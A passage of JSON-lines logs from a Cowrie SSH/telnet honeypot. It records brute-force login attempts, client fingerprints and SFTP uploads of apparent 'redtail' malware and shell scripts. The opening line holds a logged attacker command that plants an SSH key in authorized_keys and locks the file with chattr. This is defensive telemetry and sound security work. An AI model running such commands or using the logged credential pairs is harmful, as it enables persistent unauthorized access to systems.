AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a","sensor":"my-vps","timestamp":"2025-08-26T23:13:23.979337Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","size":80,"shasum":"96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/96abae0475aed33d163866113bf441296b0f7de7c3175e634e29a5b0f5aa4014 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:13:24.107255Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-26T23:13:24.213963Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-26T23:13:24.215896Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-26T23:13:24.218783Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-26T23:13:24.221291Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-26T23:13:24.223827Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-26T23:13:24.225075Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.session.closed","duration":"23.8","message":"Connection lost after 23.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:13:24.332778Z","src_ip":"212.227.235.229","session":"d8819a3174ba"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd123","message":"login attempt [todd/todd123] failed","sensor":"my-vps","timestamp":"2025-08-26T23:13:24.971235Z","src_ip":"212.227.125.160","session":"4e4446a00bf0"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd1234","message":"login attempt [todd/todd1234] failed","sensor":"my-vps","timestamp":"2025-08-26T23:13:26.068482Z","src_ip":"212.227.125.160","session":"4e4446a00bf0"}
{"eventid":"cowrie.login.failed","username":"todd","password":"todd12345","message":"login attempt [todd/todd12345] failed","sensor":"my-vps","timestamp":"2025-08-26T23:13:27.181293Z","src_ip":"212.227.125.160","session":"4e4446a00bf0"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:13:28.273644Z","src_ip":"212.227.125.160","session":"4e4446a00bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38576,"dst_ip":"1.2.3.4","dst_port":23,"session":"89ac52c578ef","protocol":"telnet","message":"New connection: 212.227.125.160:38576 (1.2.3.4:23) [session: 89ac52c578ef]","sensor":"my-vps","timestamp":"2025-08-26T23:13:38.909146Z"}
{"eventid":"cowrie.session.closed","duration":"302.2","message":"Connection lost after 302.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:13:53.702903Z","src_ip":"106.12.128.104","session":"8a71f3f08798"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61804,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9ff6cde41dd","protocol":"ssh","message":"New connection: 217.72.205.35:61804 (1.2.3.4:22) [session: b9ff6cde41dd]","sensor":"my-vps","timestamp":"2025-08-26T23:14:16.245425Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:14:16.246513Z","src_ip":"217.72.205.35","session":"b9ff6cde41dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:14:22.079763Z","src_ip":"176.65.148.28","session":"bfe4fe8f1315"}
{"eventid":"cowrie.session.closed","duration":180.12729001045227,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:14:22.084278Z","src_ip":"176.65.148.28","session":"bfe4fe8f1315"}
{"eventid":"cowrie.login.success","username":"root","password":"system32","message":"login attempt [root/system32] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:14:41.741551Z","src_ip":"212.227.125.160","session":"89ac52c578ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:14:41.835407Z","src_ip":"212.227.125.160","session":"89ac52c578ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59734,"dst_ip":"1.2.3.4","dst_port":22,"session":"41d8fbb0afe9","protocol":"ssh","message":"New connection: 212.227.235.229:59734 (1.2.3.4:22) [session: 41d8fbb0afe9]","sensor":"my-vps","timestamp":"2025-08-26T23:15:12.079779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:15:13.416734Z","src_ip":"212.227.235.229","session":"41d8fbb0afe9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:15:13.417661Z","src_ip":"212.227.235.229","session":"41d8fbb0afe9"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"321","message":"login attempt [odoo/321] failed","sensor":"my-vps","timestamp":"2025-08-26T23:15:18.285107Z","src_ip":"212.227.235.229","session":"41d8fbb0afe9"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:15:20.644162Z","src_ip":"212.227.235.229","session":"41d8fbb0afe9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43002,"dst_ip":"1.2.3.4","dst_port":22,"session":"e55315560264","protocol":"ssh","message":"New connection: 212.227.235.229:43002 (1.2.3.4:22) [session: e55315560264]","sensor":"my-vps","timestamp":"2025-08-26T23:17:40.144577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:17:41.523041Z","src_ip":"212.227.235.229","session":"e55315560264"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:17:41.523939Z","src_ip":"212.227.235.229","session":"e55315560264"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-26T23:17:47.893111Z","src_ip":"212.227.235.229","session":"e55315560264"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:17:50.662318Z","src_ip":"212.227.235.229","session":"e55315560264"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39663,"dst_ip":"1.2.3.4","dst_port":23,"session":"9282be5b3048","protocol":"telnet","message":"New connection: 212.227.125.160:39663 (1.2.3.4:23) [session: 9282be5b3048]","sensor":"my-vps","timestamp":"2025-08-26T23:19:13.550121Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46722,"dst_ip":"1.2.3.4","dst_port":23,"session":"dd2ce6f5421e","protocol":"telnet","message":"New connection: 212.227.125.160:46722 (1.2.3.4:23) [session: dd2ce6f5421e]","sensor":"my-vps","timestamp":"2025-08-26T23:19:57.951423Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:19:58.031845Z","src_ip":"212.227.125.160","session":"dd2ce6f5421e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T23:19:58.061260Z","src_ip":"212.227.125.160","session":"dd2ce6f5421e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54208,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac7ebb3e0c99","protocol":"ssh","message":"New connection: 212.227.235.229:54208 (1.2.3.4:22) [session: ac7ebb3e0c99]","sensor":"my-vps","timestamp":"2025-08-26T23:20:07.627598Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:20:08.867066Z","src_ip":"212.227.235.229","session":"ac7ebb3e0c99"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:20:08.867833Z","src_ip":"212.227.235.229","session":"ac7ebb3e0c99"}
{"eventid":"cowrie.login.failed","username":"test","password":"test1","message":"login attempt [test/test1] failed","sensor":"my-vps","timestamp":"2025-08-26T23:20:15.050329Z","src_ip":"212.227.235.229","session":"ac7ebb3e0c99"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:20:17.156044Z","src_ip":"212.227.235.229","session":"ac7ebb3e0c99"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63792,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fdc434b4192","protocol":"ssh","message":"New connection: 217.72.205.35:63792 (1.2.3.4:22) [session: 0fdc434b4192]","sensor":"my-vps","timestamp":"2025-08-26T23:21:05.153718Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:21:05.154835Z","src_ip":"217.72.205.35","session":"0fdc434b4192"}
{"eventid":"cowrie.session.closed","duration":120.0091028213501,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:21:13.559142Z","src_ip":"212.227.125.160","session":"9282be5b3048"}
{"eventid":"cowrie.session.connect","src_ip":"45.135.232.24","src_port":65289,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ab70859ddd0","protocol":"ssh","message":"New connection: 45.135.232.24:65289 (1.2.3.4:22) [session: 7ab70859ddd0]","sensor":"my-vps","timestamp":"2025-08-26T23:21:53.474419Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:21:53.475754Z","src_ip":"45.135.232.24","session":"7ab70859ddd0"}
{"eventid":"cowrie.session.connect","src_ip":"45.135.232.24","src_port":65429,"dst_ip":"1.2.3.4","dst_port":22,"session":"f99e296aa527","protocol":"ssh","message":"New connection: 45.135.232.24:65429 (1.2.3.4:22) [session: f99e296aa527]","sensor":"my-vps","timestamp":"2025-08-26T23:21:53.540897Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:21:53.541839Z","src_ip":"45.135.232.24","session":"f99e296aa527"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T23:21:53.606950Z","src_ip":"45.135.232.24","session":"f99e296aa527"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T23:21:53.804860Z","src_ip":"45.135.232.24","session":"f99e296aa527"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"45.135.232.24","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T23:21:53.871045Z","session":"f99e296aa527"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":45896,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a892c1e9f33","protocol":"ssh","message":"New connection: 93.123.109.189:45896 (1.2.3.4:22) [session: 7a892c1e9f33]","sensor":"my-vps","timestamp":"2025-08-26T23:22:05.596704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:22:05.597887Z","src_ip":"93.123.109.189","session":"7a892c1e9f33"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T23:22:05.617854Z","src_ip":"93.123.109.189","session":"7a892c1e9f33"}
{"eventid":"cowrie.login.failed","username":"validator","password":"12345678","message":"login attempt [validator/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T23:22:05.682151Z","src_ip":"93.123.109.189","session":"7a892c1e9f33"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:22:06.703928Z","src_ip":"93.123.109.189","session":"7a892c1e9f33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37240,"dst_ip":"1.2.3.4","dst_port":22,"session":"80a0c70367c8","protocol":"ssh","message":"New connection: 212.227.235.229:37240 (1.2.3.4:22) [session: 80a0c70367c8]","sensor":"my-vps","timestamp":"2025-08-26T23:22:31.071446Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T23:22:31.809942Z","src_ip":"212.227.235.229","session":"80a0c70367c8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T23:22:31.810729Z","src_ip":"212.227.235.229","session":"80a0c70367c8"}
{"eventid":"cowrie.login.failed","username":"test","password":"test12","message":"login attempt [test/test12] failed","sensor":"my-vps","timestamp":"2025-08-26T23:22:38.159262Z","src_ip":"212.227.235.229","session":"80a0c70367c8"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:22:40.440372Z","src_ip":"212.227.235.229","session":"80a0c70367c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:22:58.079528Z","src_ip":"212.227.125.160","session":"dd2ce6f5421e"}
{"eventid":"cowrie.session.closed","duration":180.13296508789062,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:22:58.084325Z","src_ip":"212.227.125.160","session":"dd2ce6f5421e"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T23:23:03.542728Z","src_ip":"45.135.232.24","session":"f99e296aa527"}
